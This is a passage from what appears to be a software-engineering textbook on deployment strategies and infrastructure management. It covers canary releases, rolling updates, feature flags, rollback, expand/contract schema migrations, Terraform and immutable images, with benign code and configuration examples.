Blue-green fits well where rollback speed matters most and infrastructure cost is acceptable — payment systems, anything with a strict change window. It is commonly combined with a canary: shift a small percentage to green first, then complete the cutover.
Key Takeaways
- Two full environments; deploy to the idle one, verify it in real production infrastructure, then switch all traffic.
- The main benefit is rollback in seconds by switching back to a still-running previous version.
- Costs roughly double infrastructure during overlap; scale the idle environment down between deploys.
- Shared state is the constraint: the database must support both versions, and in-process state is lost at cutover.
- Cutover is all-or-nothing, so combine it with a canary phase when load-related faults are a concern.
🧪 Practice
- Write a cutover script that verifies the idle environment, switches, checks live signals, and reverts automatically on failure.
- List everything in a system you know that would break at cutover because it holds in-process state.
- Interview: What does blue-green not protect you against? (Hint: think about what both environments share, and what a rollback cannot undo.)
Canary Releases
A canary release exposes a new version to a small fraction of traffic first, watches the signals, and expands only if they hold. The name comes from canaries in coal mines: a small, sensitive early warning that costs little when it goes wrong.
The reasoning is statistical. Testing environments cannot reproduce production's traffic mix, data shapes, load, and dependency behaviour, so some faults appear only in production. If a fault is going to appear, you want it to appear in front of 1% of users for two minutes rather than 100% for twenty.
PROGRESSIVE ROLLOUT
t=0 1% ├─┤ analyze 10 min ──> pass ──┐
t=10 5% ├───┤ analyze 10 min ──> pass ─┤
t=20 25% ├─────────┤ analyze ──> pass ──┤
t=40 100% ├────────────────────────────┤ done
|
any stage FAILS ----+--> abort: route 0% to canary,
keep the stable version
Exposure at fault detection: 1% x 10 min instead of 100% x however long
it takes a human to notice a dashboard.
# The analysis is the hard part: comparing the canary against the baseline
# rather than against a fixed threshold, because both move with traffic.
def analyze_canary(canary, baseline, min_requests=1000):
"""Return (verdict, reason). Compare like with like, over the same window."""
if canary.request_count < min_requests:
return "wait", "insufficient traffic for a decision"
# 1. Error rate: compare RATIOS, and require a meaningful relative increase
# so ordinary noise at low volume does not abort the rollout.
if canary.error_rate > max(baseline.error_rate * 1.5, 0.005):
return "fail", f"error rate {canary.error_rate:.3%} vs {baseline.error_rate:.3%}"
# 2. Latency: p99, not mean -- a regression usually shows in the tail first.
if canary.p99_ms > baseline.p99_ms * 1.2:
return "fail", f"p99 {canary.p99_ms}ms vs {baseline.p99_ms}ms"
# 3. Resource regressions that would only bite at full scale.
if canary.memory_rss_mb > baseline.memory_rss_mb * 1.3:
return "fail", "memory regression"
# 4. Business signals catch what technical ones cannot: a version that
# returns 200 with an empty cart is technically healthy and commercially
# broken.
if canary.checkout_conversion < baseline.checkout_conversion * 0.9:
return "fail", "conversion drop"
return "pass", "all comparisons within tolerance"
# Progressive delivery as configuration (Argo Rollouts / Flagger style).
apiVersion: argoproj.io/v1alpha1
kind: Rollout
metadata: { name: orders }
spec:
strategy:
canary:
steps:
- setWeight: 1
- pause: { duration: 10m } # long enough to accumulate signal
- analysis: # automated gate, no human required
templates: [{ templateName: success-rate-and-latency }]
- setWeight: 5
- pause: { duration: 10m }
- setWeight: 25
- pause: { duration: 20m }
- setWeight: 100
trafficRouting:
istio: { virtualService: { name: orders } }
analysis:
templates: [{ templateName: success-rate-and-latency }]
startingStep: 1 # run continuously from step 1 onward
Three details determine whether a canary actually catches anything. Traffic must be representative — if routing sends the canary only internal or only cached requests, it proves nothing; hash-based routing on user ID gives a consistent, representative slice. The window must be long enough to accumulate statistically meaningful volume, which for a low-traffic service can mean hours, and for a very low-traffic service means canarying is not viable without synthetic load. And compare against a concurrent baseline, not against yesterday, so traffic shifts and dependency weather affect both sides equally.
Canaries have blind spots worth naming: slow-burn problems (a memory leak that takes six hours), issues affecting only a rare user segment that the sample missed, and anything involving data written by the new version that the old version cannot read — which no traffic-splitting strategy can protect you from.
Key Takeaways
- Expose a small traffic fraction first and expand only if signals hold; this bounds the blast radius of production-only faults.
- Compare the canary against a concurrent baseline, not against fixed thresholds or yesterday's numbers.
- Gate on error ratio, tail latency, resource usage, and at least one business metric.
- Route representatively with a stable hash, and hold each stage long enough for statistical significance.
- Canaries miss slow-burn faults, rare segments, and forward-incompatible data writes.
🧪 Practice
- Define the analysis criteria for a canary of a checkout service, including one business metric.
- Compute how long a 1% canary must run to see 1,000 requests at your traffic level, and decide whether the plan is viable.
- Interview: Your canary passed and the full rollout caused an incident. What could explain that? (Hint: think about what changes between 1% and 100% — load, cache behaviour, connection counts, and time.)
Rolling Updates
A rolling update replaces instances of the old version with the new one incrementally: take a few out of service, upgrade them, put them back, repeat. It is the default strategy in most orchestrators because it needs no extra infrastructure and no traffic-splitting layer — capacity is maintained by never removing too many instances at once.
The mechanism depends entirely on health checks. The orchestrator adds a new instance to the load balancer only once it reports ready, and it removes an old instance only after connections drain. Both halves must work, or a rolling update becomes a rolling outage.
ROLLING UPDATE, maxSurge=1 maxUnavailable=0 (4 replicas)
step 0 [v1][v1][v1][v1] capacity 4/4
step 1 [v1][v1][v1][v1][v2*] surge one capacity 4/4 (*not ready yet)
step 2 [v1][v1][v1] [v2] drain one capacity 4/4
step 3 [v1][v1][v2*] [v2] capacity 4/4
...
step n [v2][v2][v2][v2] capacity 4/4
maxUnavailable=0 guarantees capacity throughout, at the cost of one extra
instance's resources and a slower roll.
DURING the roll, v1 and v2 both serve traffic -- so they must be mutually
compatible: same API contract, same database schema expectations, same
message formats. This is the constraint people forget.
apiVersion: apps/v1
kind: Deployment
metadata: { name: orders }
spec:
replicas: 6
strategy:
type: RollingUpdate
rollingUpdate:
maxSurge: 1 # at most 1 extra pod above `replicas`
maxUnavailable: 0 # never drop below `replicas` ready -- no capacity dip
minReadySeconds: 30 # a pod must stay healthy 30s before counting as
# available; without this, a pod that crashes at
# t=35s is replaced only after the roll finished
progressDeadlineSeconds: 600 # mark the rollout failed rather than hanging forever
template:
spec:
terminationGracePeriodSeconds: 60
containers:
- name: app
image: registry.example.com/orders@sha256:...
readinessProbe: # gates traffic
httpGet: { path: /readyz, port: 8080 }
periodSeconds: 5
failureThreshold: 2
lifecycle:
preStop:
exec:
# Fail readiness, then wait for the load balancer to notice BEFORE
# the process starts shutting down. Skipping this is the single
# most common cause of 502s during a deploy.
command: ["/bin/sh", "-c", "touch /tmp/shutting-down && sleep 15"]
# The application half of the contract (see also twelve-factor, 10.4).
import os, signal, threading
_draining = threading.Event()
def readyz():
# Readiness must go false the moment shutdown begins, and must not depend
# on downstream health -- a dependency blip should not empty your fleet.
if _draining.is_set() or os.path.exists("/tmp/shutting-down"):
return 503, "draining"
return 200, "ok"
def on_sigterm(signum, frame):
_draining.set() # 1. stop advertising readiness
server.stop_accepting() # 2. no new connections
server.await_inflight(timeout=45) # 3. finish what is in flight
os._exit(0)
signal.signal(signal.SIGTERM, on_sigterm)
The parameters express a trade. maxUnavailable: 0 with maxSurge: 1 keeps full
capacity but rolls slowly and needs headroom for the extra instance;
maxUnavailable: 25% rolls faster and accepts a capacity dip, which is fine if
you have headroom and dangerous during peak. For a stateful workload, ordered
one-at-a-time replacement is usually mandatory.
The property to keep in mind is that a rolling update is not atomic and not instantly reversible. Both versions serve simultaneously, so every change must be backward compatible for the duration; and rolling back means rolling forward to the previous version, which takes as long as the deploy did. When rollback speed is critical, blue-green or a canary with instant traffic shift is the better tool.
Key Takeaways
- Rolling updates replace instances incrementally, maintaining capacity without extra environments or traffic splitting.
- Both versions serve traffic during the roll, so every change must be backward compatible with the version it replaces.
- Readiness probes gate traffic and liveness probes restart — conflating them causes mass restarts (see 10.4).
- Drain correctly: fail readiness, wait for the load balancer to notice, then finish in-flight requests; skipping the wait causes deploy-time 502s.
- Rollback means rolling forward to the old version and takes as long as the deploy; use blue-green or canary when seconds matter.
🧪 Practice
- Configure a rolling update that never dips below full capacity and explain the resource cost of that guarantee.
- Add a preStop hook and graceful shutdown, then verify no request fails during a rolling restart under load.
- Interview: Why do requests fail during a deploy even with readiness probes configured? (Hint: think about the delay between a pod being told to stop and the load balancer learning about it.)
Feature Flags
A feature flag is a runtime condition that decides whether a code path is active. Its architectural significance is that it separates deployment from release: code ships to production disabled, and a separate, instant, reversible decision turns it on. Those two events no longer have to be the same event, which changes what deployment risk means.
That separation solves several problems at once. Long-lived feature branches disappear, because incomplete work can be merged behind a disabled flag. Rollback for a feature becomes a config change rather than a deploy. Gradual rollout by user segment becomes possible without traffic-level routing. And experimentation (A/B testing) uses the same mechanism.
# Flags with targeting: the interesting part is not the boolean but the rules.
import hashlib
class FeatureFlags:
def __init__(self, config_source):
self.source = config_source # polled or streamed; NOT a deploy artifact
def enabled(self, flag: str, ctx: dict) -> bool:
rule = self.source.get(flag)
if rule is None or not rule.get("active"):
return False # unknown flag -> off. Default safe.
for override in rule.get("overrides", []): # explicit allow/deny first
if ctx.get(override["attribute"]) in override["values"]:
return override["enabled"]
pct = rule.get("percentage", 0)
if pct <= 0: return False
if pct >= 100: return True
# Stable bucketing: the SAME user always lands the same way, so nobody
# sees the feature flicker between requests. Salting with the flag name
# keeps different flags' cohorts independent rather than correlated.
key = f"{flag}:{ctx.get('user_id', 'anonymous')}"
bucket = int(hashlib.sha256(key.encode()).hexdigest()[:8], 16) % 100
return bucket < pct
flags = FeatureFlags(config_source)
def checkout(cart, user):
ctx = {"user_id": user.id, "tier": user.tier, "country": user.country}
if flags.enabled("new_pricing_engine", ctx):
price = new_pricing(cart)
else:
price = legacy_pricing(cart) # the old path stays until the flag dies
return place_order(cart, price)
// Flag configuration, changed without deploying code.
{
"new_pricing_engine": {
"active": true,
"percentage": 10,
"overrides": [
{ "attribute": "tier", "values": ["internal"], "enabled": true },
{ "attribute": "country", "values": ["DE"], "enabled": false }
],
"owner": "pricing-team",
"created": "2026-08-01",
"expires": "2026-10-01",
"type": "release"
}
}
Flags have distinct types with different lifetimes, and conflating them is how codebases end up unmaintainable.
| Type | Purpose | Lifetime | Removal |
|---|---|---|---|
| Release | Ship dark, roll out gradually | Days to weeks | Mandatory once at 100% |
| Experiment | A/B test a hypothesis | Weeks | Remove when the test ends |
| Operational | Kill switch, load shedding | Permanent | Keep, and exercise it |
| Permission | Entitlement by plan or tenant | Permanent | Not a flag — that is authz |
The dominant risk is flag debt. Every flag doubles the number of code paths, and ten independent flags describe 1,024 possible configurations, of which you test perhaps three. The discipline that prevents this: give every flag an owner and an expiry date at creation, alert on flags past expiry, remove release flags immediately after full rollout, and never nest flags inside flags.
Three operational rules round it out. Default to off on failure — if the flag service is unreachable, take the old path, never the new one. Cache flag evaluations locally with background refresh, because a network call per flag check puts your flag provider on the critical path of every request. And log flag state with requests, so an incident investigation can tell which cohort a failing request was in — otherwise "it works for me" becomes unresolvable.
Key Takeaways
- Feature flags separate deployment from release: ship disabled, enable instantly, disable instantly.
- Bucket users with a stable hash salted by flag name so experience is consistent and cohorts are independent.
- Distinguish release, experiment, and operational flags — the first two must be removed, the third is permanent.
- Flag debt is exponential: assign an owner and expiry at creation and enforce removal.
- Fail closed to the old path, evaluate from a local cache, and log flag state alongside requests.
🧪 Practice
- Implement percentage rollout with stable per-user bucketing and prove the same user gets the same answer across restarts.
- Audit a codebase for flags older than 90 days and write the removal plan for one of them.
- Interview: What happens to your system if the feature flag service goes down? (Hint: think about defaults, caching, and whether "no flags" is a state your code handles.)
Rollback Strategies
Rollback is the mitigation that resolves most incidents, and the ability to perform it quickly and confidently is worth more than any amount of pre-deploy testing. The reason is arithmetic: testing reduces the probability of a bad deploy, while rollback reduces the duration of every bad deploy that still gets through — and duration is the term that dominates user impact.
The discipline is to roll back first and investigate afterwards. The instinct to understand the problem before reverting is natural and wrong: every minute spent diagnosing is a minute of user impact, and the diagnosis is easier once the system is stable and you can reproduce the fault off the critical path.
WHAT CAN AND CANNOT BE ROLLED BACK
EASY: stateless code revert the artifact
EASY: configuration revert the config version
EASY: feature flag flip it off (seconds, no deploy)
HARD: additive schema change old code ignores new columns -- usually fine
HARD: data written in a new format old code may not be able to read it
IMPOSSIBLE: destructive migration a dropped column has no undo
IMPOSSIBLE: side effects already
emitted sent emails, charged cards, published
events that consumers already processed
The design consequence: keep changes ROLLBACK-SAFE by construction --
expand/contract migrations, backward-compatible formats, and idempotent
side effects behind flags.
# Rollback decision as a checklist, because under stress people follow lists.
def rollback_plan(change):
steps = []
if change.feature_flagged:
steps.append(("flip_flag_off", "seconds", "no deploy needed"))
return steps # fastest possible path: stop here
if change.config_only:
steps.append(("revert_config", "under a minute", "restart may be needed"))
return steps
steps.append(("deploy_previous_digest", "2-10 min", "the standard path"))
if change.schema_migration:
# THE question, and it must be answerable before the deploy, not after.
if change.migration_is_expand_only:
steps.append(("leave_schema_alone", "-",
"old code tolerates the new column"))
else:
steps.append(("MANUAL", "unknown",
"destructive migration: restore or forward-fix"))
if change.emits_new_event_format:
steps.append(("check_consumers", "-",
"consumers may already have processed new-format events"))
return steps
# Automated rollback: the fastest possible response is one that needs no human.
def watch_and_rollback(deploy, signals, window_s=600, threshold=1.5):
baseline = signals.baseline_error_rate(deploy.service)
for _ in range(window_s // 30):
observed = signals.error_rate(deploy.service, window="2m")
if observed > max(baseline * threshold, 0.01):
deploy.rollback() # act first
alert(f"auto-rolled back {deploy.version}: "
f"error rate {observed:.2%} vs baseline {baseline:.2%}")
return "rolled_back"
sleep(30)
return "healthy"
What makes rollback reliable rather than theoretical:
- Keep the previous artifact deployable. Immutable, digest-addressed images and retained previous versions; if rollback requires rebuilding from an old commit, it is not a rollback.
- Version configuration too. A config change is a deploy and needs the same revert path.
- Rehearse it. A rollback path first exercised during an incident is a gamble; roll back deliberately in staging, and occasionally in production.
- Automate the trigger. Signal-based automatic rollback beats a human noticing by minutes, which is the whole game.
- Know the point of no return. Every change should be labelled before deploy with whether it is reversible, and irreversible ones get extra scrutiny, smaller batches, and a forward-fix plan.
Forward fix is the alternative when rollback is impossible — ship a corrective change instead. It is strictly worse when rollback is available, because it requires writing correct code under time pressure, but it is the only option once data has been transformed destructively or side effects have escaped. Planning which of the two applies is part of designing the change, not part of the incident.
Key Takeaways
- Rollback reduces the duration of every bad deploy, which matters more than reducing the probability of one.
- Roll back first, diagnose afterwards — diagnosis is easier and cheaper once the system is stable.
- Feature flags give the fastest rollback; artifact reverts are next; destructive migrations and emitted side effects may not be reversible at all.
- Keep previous artifacts deployable and versioned, and version configuration the same way.
- Rehearse rollbacks, automate the trigger on live signals, and label every change with whether it is reversible before it ships.
🧪 Practice
- Classify the last ten changes in a repository as reversible, partially reversible, or irreversible, and say what would be needed for each.
- Implement automatic rollback triggered by an error-rate comparison against a pre-deploy baseline.
- Interview: When is forward-fixing the right choice over rolling back? (Hint: think about what state the old version can no longer read, and what has already left the system.)
Zero-Downtime Migrations
A schema change is the one deploy that cannot be atomic: the database is shared, and during any rolling update or blue-green overlap, two versions of the application run against one schema. Any migration that requires them to disagree about the schema causes errors, and any migration that locks a large table causes an outage regardless of application versions.
The technique that solves this is expand/contract (also called parallel-change): never change a thing in place; add the new thing, migrate to it, and only remove the old thing once nothing references it. Each step is individually backward compatible, so every intermediate state is deployable and rollback-safe.
RENAMING A COLUMN, THE ONLY SAFE WAY (username -> handle)
step 1 EXPAND add `handle` (nullable, no default backfill)
deploy N/A -- schema only, old code unaffected
step 2 DUAL WRITE deploy code that writes BOTH columns, reads `username`
old code still running is fine: it ignores `handle`
step 3 BACKFILL copy username -> handle in batches, throttled
no lock held for long; safe to pause and resume
step 4 SWITCH deploy code that reads `handle`, still writes both
rollback is safe: `username` is still current
step 5 STOP WRITE deploy code that only uses `handle`
`username` now stale but present -- still reversible-ish
step 6 CONTRACT drop `username` after a soak period
THIS is the irreversible step; do it last and separately
Six deploys instead of one. That is the price of never having downtime and
never having an unrecoverable moment.
# Step 2 and 4 in application code: the dual-write window.
def update_profile(user_id, new_handle, db, flags):
# Write both columns while any reader of either might still be running.
db.execute("UPDATE users SET username = %s, handle = %s WHERE id = %s",
(new_handle, new_handle, user_id))
def read_profile(user_id, db, flags):
row = db.query("SELECT username, handle FROM users WHERE id = %s", (user_id,))
# The read switch is a FLAG, not a deploy: it flips in seconds and reverts
# in seconds, which is exactly what you want for the riskiest step.
if flags.enabled("read_handle_column", {"user_id": user_id}):
return row["handle"] or row["username"] # fall back while backfilling
return row["username"]
-- Step 1: expand. Nullable, no default, no rewrite of existing rows.
ALTER TABLE users ADD COLUMN handle varchar(50);
-- A NOT NULL column WITH a default rewrites the whole table on older engines
-- and takes a long ACCESS EXCLUSIVE lock. Add nullable, backfill, then
-- constrain -- in that order.
-- Step 3: backfill in bounded batches so no single statement holds a long lock
-- and replication lag stays manageable.
UPDATE users SET handle = username
WHERE handle IS NULL
AND id IN (SELECT id FROM users WHERE handle IS NULL ORDER BY id LIMIT 5000);
-- Loop this with a pause between batches; monitor replica lag between runs.
-- Index creation must not block writes.
CREATE INDEX CONCURRENTLY idx_users_handle ON users (handle);
-- CONCURRENTLY is slower and can leave an INVALID index if it fails --
-- check for that and drop/retry rather than assuming success.
-- Adding a constraint without a long validation lock: two steps.
ALTER TABLE users ADD CONSTRAINT handle_not_null CHECK (handle IS NOT NULL) NOT VALID;
ALTER TABLE users VALIDATE CONSTRAINT handle_not_null; -- takes a weaker lock
-- Step 6: contract, much later, as its own change.
ALTER TABLE users DROP COLUMN username;
| Operation | Safe? | Note |
|---|---|---|
| Add nullable column | Yes | Metadata-only on modern engines |
| Add column with NOT NULL DEFAULT | Engine-dependent | May rewrite the table; check your version |
| Drop column | Irreversible | Contract step only, after a soak |
| Rename column or table | Never in place | Use expand/contract |
| Add index | Yes, concurrently | Non-concurrent blocks writes |
| Change column type | Usually not | New column + backfill + switch |
| Add foreign key | Careful | Add NOT VALID, then validate separately |
Two further rules. Migrations run separately from application deploys, so a slow migration does not block a rollout and a rollback does not try to reverse a schema change. And every migration needs a tested rollback path or an explicit statement that it has none — for destructive steps, the honest answer is "restore from backup", which is only acceptable if you have rehearsed that restore (9.4).
Key Takeaways
- Two application versions always share one schema during a deploy, so every migration must be compatible with both.
- Use expand/contract: add, dual-write, backfill, switch reads, stop writing the old, then drop — six safe steps instead of one unsafe one.
- Never rename or retype in place; add a new column and migrate to it.
- Backfill in throttled batches, build indexes concurrently, and add constraints as NOT VALID then validate.
- Run migrations separately from deploys, and put the read-switch behind a feature flag so the riskiest step is instantly reversible.
🧪 Practice
- Write the full six-step plan to rename a column on a 200-million-row table, including where each application deploy lands.
- Implement a throttled backfill that monitors replica lag and pauses when it exceeds a threshold.
- Interview: Why can you not just run
ALTER TABLE ... RENAME COLUMNduring a deploy? (Hint: think about which application versions are running at that exact moment and what each of them expects to find.)
<a id="124-infrastructure-management"></a>
12.4 Infrastructure Management
Infrastructure that exists only as the accumulated result of past manual changes cannot be reasoned about, reproduced, or safely modified. This subchapter covers defining infrastructure as code, replacing rather than patching servers, managing the configuration that varies between environments, keeping those environments close enough that testing means something, and writing down the operational knowledge that would otherwise live in one person's head.
Infrastructure as Code
Infrastructure as code (IaC) means defining servers, networks, databases, and permissions in version-controlled files, and having a tool make reality match those files. The alternative — clicking through a console or running ad-hoc commands — produces infrastructure nobody can describe: the configuration is whatever the last person did, there is no record of why, and reproducing the environment is archaeology.
The properties this buys are the same ones version control brought to application code, and they are worth naming individually because each solves a specific operational pain: reproducibility (build an identical environment on demand), reviewability (infrastructure changes go through pull requests), auditability (git history says who changed what and why), disaster recovery (rebuild from code rather than from memory), and testability (validate a change before applying it).
IMPERATIVE DECLARATIVE
"run these commands in order" "this is the desired end state"
create_vpc() resource "aws_vpc" "main" {
create_subnet(vpc) cidr_block = "10.0.0.0/16"
create_instance(subnet) }
attach_security_group(instance)
The tool computes the DIFF between
Running it twice: errors, or desired and actual, and applies only
duplicate resources. You must what is missing. Running it twice
encode every current state. changes nothing the second time.
-> idempotent by construction
# Terraform: declarative, with the plan/apply cycle as the safety mechanism.
terraform {
required_version = "~> 1.7"
backend "s3" {
bucket = "example-tfstate"
key = "prod/orders/terraform.tfstate"
dynamodb_table = "tfstate-locks" # state locking: two applies cannot race
encrypt = true
}
}
variable "environment" { type = string }
variable "instance_count" {
type = number
validation { # fail at plan time, not at 3 a.m.
condition = var.instance_count >= 2
error_message = "At least two instances are required for availability."
}
}
resource "aws_db_instance" "orders" {
identifier = "orders-${var.environment}"
engine = "postgres"
engine_version = "16.3" # pin: 'latest' is not reproducible
instance_class = var.environment == "production" ? "db.r6g.xlarge" : "db.t4g.small"
backup_retention_period = 30
deletion_protection = var.environment == "production"
storage_encrypted = true # see 11.2
lifecycle {
prevent_destroy = true # a typo must not delete the database
ignore_changes = [engine_version] # let managed minor upgrades happen
}
tags = {
Environment = var.environment
Owner = "orders-team"
ManagedBy = "terraform" # marks what humans must not touch
}
}
output "db_endpoint" { value = aws_db_instance.orders.endpoint }
The state file is the concept that surprises people. Terraform records what it believes exists so it can compute diffs; that state must be stored remotely, locked during operations, encrypted (it contains sensitive values), and backed up. State corruption or divergence — usually caused by someone making a manual change — is the most common operational problem with IaC.
Which brings up the discipline that determines whether IaC works at all:
changes must go through code. A single manual console change creates drift,
and the next apply will either revert it (surprising whoever made it) or fail.
Detecting drift continuously and treating it as an incident is what keeps the
files authoritative rather than aspirational.
# Drift detection and policy enforcement in CI.
name: infrastructure
on:
pull_request:
schedule: [{ cron: "0 */6 * * *" }] # detect drift even without a PR
jobs:
plan:
steps:
- run: terraform init
- run: terraform validate
- run: terraform plan -detailed-exitcode -out=tfplan
# exit 0 = no changes, 2 = changes pending. On the schedule, exit 2
# means someone changed something outside of code -> alert.
continue-on-error: true
- run: tfsec . && checkov -d . # policy: public buckets, open SGs,
# unencrypted volumes, wide IAM
- run: infracost breakdown --path tfplan # cost delta in the PR comment
Two design habits keep IaC maintainable at scale: modularize repeated patterns (a "service" module used by twenty services beats twenty copies), and separate state by blast radius — networking, data stores, and applications in different state files, so an application change cannot plan a VPC deletion.
Key Takeaways
- Define infrastructure in version-controlled files and let a tool reconcile reality to them; the console is for reading, not changing.
- Declarative definitions are idempotent by construction: the tool diffs desired against actual.
- Remote, locked, encrypted state is mandatory, and drift from manual changes is the main operational hazard.
- Review infrastructure changes as pull requests with automated policy, security, and cost checks on the plan.
- Modularize repeated patterns and split state by blast radius so a small change cannot plan a large deletion.
🧪 Practice
- Define a database and its security group in Terraform with validation, deletion protection, and required tags.
- Add a scheduled drift-detection job and deliberately create drift to confirm it is caught.
- Interview: What goes wrong when someone changes a resource in the console? (Hint: think about what the tool believes exists and what the next apply will try to do about the difference.)
Immutable Infrastructure
Immutable infrastructure means servers are never modified after deployment. To change anything — a code version, a package, a kernel setting — you build a new image and replace the instance. The alternative, mutable infrastructure, patches running servers in place with configuration management or manual commands.
The problem immutability solves is configuration drift. Servers patched in place diverge: one missed a package update during a network blip, another has a manual fix from an incident two years ago, a third was built from an older base image. Eventually you have "snowflake" servers whose exact state nobody knows, which is why a bug reproduces on three hosts out of twenty and why rebuilding a failed host does not restore the same behaviour.
MUTABLE IMMUTABLE
server-1 base + patch A + patch B build IMAGE v42 (once, in CI)
server-2 base + patch A |
server-3 base + patch A + hotfix +---+---+---+
+ manual change (2024) v v v v
[v42][v42][v42][v42] all identical
divergent, unknowable state
"works on server-2" change anything -> build v43,
rebuild != same state replace instances, discard v42
rollback = redeploy v42's image
# The image IS the unit of change. Everything variable comes in at run time.
FROM golang:1.22 AS build
WORKDIR /src
COPY go.mod go.sum ./
RUN go mod download
COPY . .
RUN CGO_ENABLED=0 go build -ldflags="-X main.version=${VERSION}" -o /out/app ./cmd
FROM gcr.io/distroless/static:nonroot
COPY --from=build /out/app /app
USER nonroot:nonroot
ENTRYPOINT ["/app"]
# No SSH server, no package manager, no shell. You cannot log in and "just fix
# it", which is the point: the absence of a repair path forces replacement and
# keeps every instance identical.
# Immutability is a property you can assert, not just intend.
def verify_fleet_uniformity(instances):
"""Every instance in a group must run the exact same image digest."""
digests = {i.id: i.image_digest for i in instances}
unique = set(digests.values())
if len(unique) > 1:
# During a deploy this is expected and transient; outside a deploy it
# means something was changed out of band, or a rollout stalled.
return False, f"{len(unique)} distinct images: {unique}"
return True, digests
# The operational rule that follows: no SSH into production. If you need to
# inspect a host, you need better telemetry (12.1) -- and if you need to fix
# a host, you need a new image. An instance you logged into is no longer
# identical to its siblings and should be replaced, not returned to service.
The consequences are worth being explicit about, because immutability changes how several ordinary tasks work:
- Patching becomes rebuilding the base image and rolling the fleet, so image builds must be fast and automated or security patching becomes slow.
- Debugging cannot rely on logging into a box; it relies on telemetry, and where deep inspection is needed, on removing an instance from service and quarantining it for analysis.
- State must live elsewhere — databases, object storage, caches — because an instance can be destroyed at any moment (the twelve-factor rule from 10.4).
- Boot time matters more, since scaling and replacement both wait on it; bake dependencies into the image rather than installing at startup.
- Image sprawl needs lifecycle management: retention policies, vulnerability rescanning of images still in use, and a promotion path from build to production-approved.
The payoff is that deployment, rollback, scaling, and disaster recovery all become the same operation — start instances from a known image — which is a substantial reduction in the number of distinct procedures a team must maintain and rehearse.
Key Takeaways
- Never modify running servers; build a new image and replace them.
- This eliminates configuration drift and snowflake servers, so any instance is interchangeable with any other.
- Deployment, rollback, scaling, and recovery collapse into one operation: launch from a known image.
- Removing shells and package managers from images enforces the discipline that convention alone will not.
- Requires state to live outside the instance, fast automated image builds for patching, and image lifecycle management.
🧪 Practice
- Build a minimal image with no shell and describe how you would diagnose a memory issue in it.
- Write a check that alerts when instances in one group run different image digests outside a deploy window.
- Interview: How do you apply an urgent security patch under immutable infrastructure? (Hint: think about what must already be automated for this to take minutes rather than days.)
Configuration Management
Configuration is everything that varies between deployments of the same artifact: endpoints, credentials, timeouts, pool sizes, feature toggles, log levels. It needs managing because it changes independently of code, changes more often, and causes a large share of incidents — a wrong timeout or a bad connection string takes a system down as surely as a bad deploy, usually faster and with less review.
The foundational rule (10.4) is configuration lives in the environment, not in the artifact, so one image runs everywhere. Beyond that, the design questions are where configuration comes from, how it is validated, and whether it can change without a restart.
PRECEDENCE, lowest to highest -- each layer overrides the one below
defaults in code safe, working values; the app runs with nothing else
^
config file / ConfigMap per-environment settings, in version control
^
environment variables per-deployment overrides
^
secret store credentials, injected separately (11.2)
^
runtime overrides feature flags, dynamic tuning -- no restart
Later layers override earlier ones. Every value must be traceable to the
layer it came from, or debugging "why is the timeout 30s here?" is guesswork.
from pydantic_settings import BaseSettings
from pydantic import Field, PostgresDsn, field_validator
class Settings(BaseSettings):
"""Validated at startup. An invalid config must fail immediately and
loudly, not surface as a mysterious timeout under load three hours later."""
database_url: PostgresDsn # required; no default
db_pool_size: int = Field(default=10, ge=1, le=100) # bounded
http_timeout_s: float = Field(default=2.0, gt=0, le=30)
log_level: str = Field(default="info", pattern="^(debug|info|warn|error)$")
environment: str = Field(pattern="^(development|staging|production)$")
cache_ttl_s: int = Field(default=300, ge=0)
@field_validator("db_pool_size")
@classmethod
def pool_must_suit_environment(cls, v, info):
# Cross-field validation catches the combinations that individually
# look fine: 200 connections per instance x 40 instances exhausts the
# database's connection limit long before anyone notices.
if info.data.get("environment") == "production" and v < 5:
raise ValueError("production requires a pool of at least 5")
return v
model_config = {"env_prefix": "APP_", "extra": "forbid"}
# extra="forbid": a typo in APP_DB_POOL_SIZE_ fails at boot instead of
# silently leaving the default in place.
settings = Settings() # raises at import time if anything is wrong
# Configuration as versioned data, reviewed like code.
apiVersion: v1
kind: ConfigMap
metadata:
name: orders-config
annotations:
# Change the annotation on every update so pods roll and actually pick it
# up -- mounted ConfigMaps update lazily, and env-var ones never do.
config-hash: "sha256:9f2b8c..."
data:
APP_DB_POOL_SIZE: "20"
APP_HTTP_TIMEOUT_S: "2.0"
APP_LOG_LEVEL: "info"
APP_CACHE_TTL_S: "300"
---
# Secrets come from a different object with different access control (11.2).
apiVersion: v1
kind: Secret
metadata: { name: orders-secrets }
stringData:
APP_DATABASE_URL: "postgres://..."
The practices that prevent configuration incidents:
- Validate at startup, fail fast. A service that boots with an invalid configuration and fails later is much harder to diagnose than one that refuses to start.
- Version and review configuration changes through the same pipeline as code. Most organizations gate code review far more strictly than config review, and the incident data does not justify the asymmetry.
- Roll out config changes progressively. A bad value applied to the whole fleet simultaneously is a self-inflicted outage; treat it like a deploy.
- Never put secrets in configuration files — separate store, separate access control, separate audit.
- Make dynamic config explicit. Values that change without restart (flags, tuning knobs) need bounds, defaults on fetch failure, and change logging.
- Log effective configuration at startup, with secrets redacted, so an incident responder can see what the process actually believes.
| Configuration type | Change frequency | Mechanism | Restart? |
|---|---|---|---|
| Build-time constants | Per release | Baked into the artifact | Yes |
| Environment settings | Rarely | ConfigMap / env vars | Usually |
| Secrets | On rotation | Secret store injection | Depends |
| Feature flags | Continuously | Flag service | No |
| Tuning parameters | Occasionally | Dynamic config service | No |
Key Takeaways
- Configuration lives in the environment so one artifact runs everywhere; layer precedence must be explicit and traceable.
- Validate at startup with types, bounds, and cross-field rules, and refuse to start on invalid values.
- Review and version configuration changes as strictly as code, and roll them out progressively — they cause a large share of incidents.
- Keep secrets in a separate store with separate access control.
- Log effective configuration at boot with secrets redacted, and give dynamic values bounds plus a safe default on fetch failure.
🧪 Practice
- Add startup validation to a service with bounds on at least four settings and one cross-field rule.
- Design the precedence order for your configuration sources and write a function that reports which layer supplied each effective value.
- Interview: Why do configuration changes cause so many incidents relative to the review they receive? (Hint: compare the review, testing, and rollout process a config change gets with what a code change gets.)
Environment Parity
Environment parity is the degree to which development, staging, and production resemble each other. It matters because the entire value of testing before production rests on the assumption that behaviour transfers — and every difference between environments is a place that assumption fails silently.
The classic divergences are familiar because they are all locally convenient: SQLite in development and Postgres in production, an in-memory queue instead of Kafka, one instance instead of forty, a 50-row dataset instead of 50 million, mocked third parties, and no TLS. Each saves setup time and each hides a class of bug — concurrency, connection limits, query plans on real data volumes, serialization formats, certificate handling.
THE PARITY GAP AND WHAT HIDES IN IT
dimension dev staging production
--------------- ------------- --------------- -----------------
database SQLite Postgres 16 Postgres 16 <- SQL dialect,
data volume 50 rows 10k rows 50M rows query plans
